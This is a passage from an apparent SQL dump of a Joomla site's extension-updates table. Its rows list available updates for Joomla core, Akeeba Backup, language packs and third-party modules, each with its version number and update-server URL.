package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(30853,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30854,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30855,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30856,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30857,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(30858,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30859,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30860,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30861,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30862,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(30863,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30864,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30865,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30866,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30867,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(30868,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30869,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30870,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30871,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30872,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(30873,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30874,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30875,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30876,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30877,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(30878,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30879,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30880,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(30881,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(30882,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(30883,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(30884,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(30885,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(30886,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(30887,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30888,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30889,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30890,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30891,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.3.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(30892,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(30893,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(30894,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(30895,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30896,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30897,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(30898,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30899,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30900,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30901,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(30902,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(30903,3,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(30904,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(30905,3,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30906,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30907,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30908,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30909,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30910,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(30911,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(30912,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.3.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30913,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(30914,3,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(30915,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30916,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30917,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30918,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(30919,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30920,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30921,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30922,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(30923,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(30924,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(30925,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(30926,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(30927,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30928,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.3.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30929,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30930,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(30931,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30932,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30933,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.3.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(30934,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(30935,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(30936,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(30937,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(30938,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(30939,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(30940,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(30941,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(30942,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(30943,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(30944,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(30945,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(30946,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(30947,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(30948,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(30949,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(30950,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(30951,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(30952,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30953,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30954,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30955,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30956,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.3.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(30957,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(30958,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(30959,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(30960,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30961,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30962,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(30963,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30964,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30965,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30966,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(30967,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(30968,57,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(30969,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(30970,57,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30971,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30972,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30973,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30974,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30975,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(30976,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(30977,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.3.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30978,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(30979,57,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(30980,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30981,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30982,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30983,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(30984,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30985,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30986,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30987,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(30988,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(30989,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(30990,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(30991,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(30992,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30993,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.3.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30994,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30995,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(30996,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30997,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30998,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.3.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(30999,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31000,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31001,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31002,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31003,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31005,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.1','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-1			\n		',''),(31006,129,0,'JCE 2.9.18','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.18','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-18-released',''),(31007,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.7','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(31008,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(31009,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31010,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31011,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31012,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31013,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31014,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31015,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31016,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31017,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31018,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31019,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31020,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31021,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31022,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31023,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31024,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31025,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31026,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31027,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31028,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31029,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31030,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31031,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31032,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31033,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31034,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31035,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31036,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31037,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31038,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31039,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31040,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31041,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31042,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31043,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31044,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31045,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31046,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31047,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31048,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31049,3,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31050,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31051,3,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31052,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31053,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31054,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31055,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31056,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31057,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31058,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31059,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31060,3,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31061,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31062,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31063,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31064,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31065,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31066,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31067,3,0,'Portuguese, 